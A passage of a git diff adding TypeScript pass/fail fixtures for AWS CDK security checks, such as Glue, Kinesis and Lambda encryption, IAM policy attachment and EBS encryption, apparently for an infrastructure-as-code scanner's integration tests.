+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{
+      kmsKeyArn: 'kmsKeyArn',
+      s3EncryptionMode: 'SSE-KMS',
+    }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{
+      kmsKeyArn: 'kmsKeyArn',
+      s3EncryptionMode: 'SSE-S3',
+    }],
+  },
+  name: 'name',
+});
+
+const cfnDataCatalogEncryptionSettingsProps: glue.CfnDataCatalogEncryptionSettingsProps = {
+  catalogId: 'catalogId',
+  dataCatalogEncryptionSettings: {
+    connectionPasswordEncryption: {
+      kmsKeyId: 'kmsKeyId',
+      returnConnectionPasswordEncrypted: true,
+    },
+    encryptionAtRest: {
+      catalogEncryptionMode : "SSE-KMS",
+      catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+      sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+  },
+};
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts
new file mode 100644
index 00000000000..2243177e218
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts
@@ -0,0 +1,13 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1:  glue.CfnCrawlerProps = {
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps2: glue.CfnDevEndpointProps = {
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps3: glue.CfnJobProps = {
+  name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts
new file mode 100644
index 00000000000..d98a98bee78
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts
@@ -0,0 +1,13 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new glue.CfnCrawler(this, 'MyCfnSecurityConfiguration', {
+  name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new glue.CfnDevEndpoint(this, 'MyCfnSecurityConfiguration', {
+  name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new glue.CfnJob(this, 'MyCfnSecurityConfiguration', {
+  name: 'name',
+});
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts
new file mode 100644
index 00000000000..996755eaeae
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts
@@ -0,0 +1,32 @@
+import {aws_glue as glue} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new glue.CfnCrawler(this, 'MyCfnSecurityConfiguration', {
+    crawlerSecurityConfiguration: 'securityConfiguration',
+    name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new glue.CfnDevEndpoint(this, 'MyCfnSecurityConfiguration', {
+    securityConfiguration: 'securityConfiguration',
+    name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new glue.CfnJob(this, 'MyCfnSecurityConfiguration', {
+    securityConfiguration: 'securityConfiguration',
+    name: 'name',
+});
+
+const cfnSecurityConfigurationProps1: glue.CfnCrawlerProps = {
+    name: 'name',
+    crawlerSecurityConfiguration: 'securityConfiguration',
+};
+
+const cfnSecurityConfigurationProps2: glue.CfnDevEndpointProps = {
+    name: 'name',
+    securityConfiguration: 'securityConfiguration',
+};
+
+const cfnSecurityConfigurationProps3: glue.CfnJobProps = {
+    name: 'name',
+    securityConfiguration: 'securityConfiguration',
+};
+
diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts
new file mode 100644
index 00000000000..0e657cf3590
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts
@@ -0,0 +1,6 @@
+import { aws_iam as iam } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: iam.PolicyProps = {
+  statements: [{}],
+  users: [{}]
+};
diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts
new file mode 100644
index 00000000000..647d7c4c6f4
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts
@@ -0,0 +1,26 @@
+import { aws_iam as iam } from 'aws-cdk-lib';
+
+const a = new iam.Policy(this, 'userpool-policy', {
+  statements: [new iam.PolicyStatement({
+    actions: ['cognito-idp:DescribeUserPool'],
+    resources: ['Arn'],
+  })],
+  users: ['sdsd']
+});
+
+const b = new iam.Policy(this, 'userpool-policy', {
+  statements: [new iam.PolicyStatement({
+    actions: ['cognito-idp:DescribeUserPool'],
+    resources: ['Arn'],
+  })],
+});
+console.log('dsd')
+b.attachToUser({})
+
+const c = new iam.Policy(this, 'userpool-policy', {
+  statements: [new iam.PolicyStatement({
+    actions: ['cognito-idp:DescribeUserPool'],
+    resources: ['Arn'],
+  })],
+});
+c.attachToUser({})
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts
new file mode 100644
index 00000000000..6697828bc2e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts
@@ -0,0 +1,15 @@
+import { aws_iam as iam } from 'aws-cdk-lib';
+
+const a = new iam.Policy(this, 'userpool-policy', {
+  statements: [new iam.PolicyStatement({
+    actions: ['cognito-idp:DescribeUserPool'],
+    resources: ['Arn'],
+  })],
+});
+
+const cfnSecurityConfigurationProps1: iam.PolicyProps = {
+  statements: [new iam.PolicyStatement({
+    actions: ['cognito-idp:DescribeUserPool'],
+    resources: ['Arn'],
+  })],
+};
diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts
new file mode 100644
index 00000000000..20232b10244
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts
@@ -0,0 +1,10 @@
+import { aws_kinesis as kinesis } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: kinesis.CfnStreamProps = {
+  streamEncryption: { encryptionType: "None", keyId: "dfdf"},
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps2: kinesis.CfnStreamProps = {
+  name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts
new file mode 100644
index 00000000000..5afeac9376a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts
@@ -0,0 +1,10 @@
+import { aws_kinesis as kinesis } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new kinesis.CfnStream(this, 'MyCfnSecurityConfiguration', {
+  streamEncryption: { encryptionType: "None", keyId: "dfdf"},
+  name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new kinesis.CfnStream(this, 'MyCfnSecurityConfiguration', {
+  name: 'name',
+});
diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts
new file mode 100644
index 00000000000..815a69069e1
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts
@@ -0,0 +1,6 @@
+import { aws_kinesis as kinesis } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: kinesis.CfnStreamProps = {
+  streamEncryption: { encryptionType: "KMS", keyId: "dfdf"},
+  name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts
new file mode 100644
index 00000000000..f6c67f57e14
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts
@@ -0,0 +1,16 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+  name: 'name',
+  role: "",
+};
+
+const cfnSecurityConfigurationProps1: lambda.CfnFunctionProps = {
+  name: 'name',
+  role: "",
+};
+
+const cfnSecurityConfigurationProps2: sam.CfnFunctionProps = {
+  name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts
new file mode 100644
index 00000000000..78e459dc77d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts
@@ -0,0 +1,17 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts
new file mode 100644
index 00000000000..ac1785db264
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts
@@ -0,0 +1,21 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    deadLetterQueue: {},
+    deadLetterQueueEnabled: true,
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    deadLetterConfig: {},
+});
+
+const cfnSecurityConfiguration2 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    deadLetterQueue: {},
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts
new file mode 100644
index 00000000000..1e3b04d006f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    }
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts
new file mode 100644
index 00000000000..53fd9d05779
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts
@@ -0,0 +1,63 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {}
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn"
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn"
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {}
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn"
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn"
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts
new file mode 100644
index 00000000000..7b177449acd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    },
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts
new file mode 100644
index 00000000000..5b8dc049840
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts
@@ -0,0 +1,31 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts
new file mode 100644
index 00000000000..1e3b04d006f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    }
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts
new file mode 100644
index 00000000000..8f3a13bb29c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts
@@ -0,0 +1,69 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {},
+    "reservedConcurrentExecutions": 1,
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {},
+    reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts
new file mode 100644
index 00000000000..63deab6d904
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts
@@ -0,0 +1,27 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts
new file mode 100644
index 00000000000..4fc24e72e40
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts
@@ -0,0 +1,69 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {},
+    "vpc": {},
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    vpcConfig: {},
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+    role: "",
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    vpcConfig: {},
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        "bla": "bla",
+    },
+    environmentEncryption: {},
+    reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+    name: 'name',
+    role: "",
+    environment: {
+        variables: {
+            "bla": "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+    name: 'name',
+    environment: {
+        variables: {
+            bla: "bla",
+        }
+    },
+    kmsKeyArn: "arn",
+    reservedConcurrentExecutions: 1,
+};
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts
new file mode 100644
index 00000000000..1d3aa5f5bf0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts
@@ -0,0 +1,44 @@
+import {aws_autoscaling as autoscaling} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: autoscaling.CfnLaunchConfigurationProps = {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+
+    // the properties below are optional
+    associatePublicIpAddress: false,
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+
+        // the properties below are optional
+        ebs: {
+            deleteOnTermination: false,
+            encrypted: false,
+            iops: 123,
+            snapshotId: 'snapshotId',
+            throughput: 123,
+            volumeSize: 123,
+            volumeType: 'volumeType',
+        },
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+    classicLinkVpcId: 'classicLinkVpcId',
+    classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+    ebsOptimized: false,
+    iamInstanceProfile: 'iamInstanceProfile',
+    instanceId: 'instanceId',
+    instanceMonitoring: false,
+    kernelId: 'kernelId',
+    keyName: 'keyName',
+    launchConfigurationName: 'launchConfigurationName',
+    metadataOptions: {
+        httpEndpoint: 'httpEndpoint',
+        httpPutResponseHopLimit: 123,
+        httpTokens: 'httpTokens',
+    },
+    placementTenancy: 'placementTenancy',
+    ramDiskId: 'ramDiskId',
+    securityGroups: ['securityGroups'],
+    spotPrice: 'spotPrice',
+    userData: 'userData',
+};
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts
new file mode 100644
index 00000000000..1e181aa899f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts
@@ -0,0 +1,30 @@
+import {aws_autoscaling as autoscaling} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+
+        // the properties below are optional
+        ebs: {
+            deleteOnTermination: false,
+            encrypted: false,
+            iops: 123,
+            snapshotId: 'snapshotId',
+            throughput: 123,
+            volumeSize: 123,
+            volumeType: 'volumeType',
+        },
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+});
+
+const cfnSecurityConfiguration2 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+    blockDeviceMappings: [{
+        ebs: {
+            encrypted: false,
+        },
+    }],
+});
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts
new file mode 100644
index 00000000000..112dd95dce5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts
@@ -0,0 +1,155 @@
+import { aws_autoscaling as autoscaling } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+
+        // the properties below are optional
+        ebs: {
+            deleteOnTermination: false,
+            encrypted: true,
+            iops: 123,
+            snapshotId: 'snapshotId',
+            throughput: 123,
+            volumeSize: 123,
+            volumeType: 'volumeType',
+        },
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+});
+
+const cfnSecurityConfiguration2 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+
+        // the properties below are optional
+        ebs: {
+            deleteOnTermination: false,
+            iops: 123,
+            snapshotId: 'snapshotId',
+            throughput: 123,
+            volumeSize: 123,
+            volumeType: 'volumeType',
+        },
+        noDevice: false,
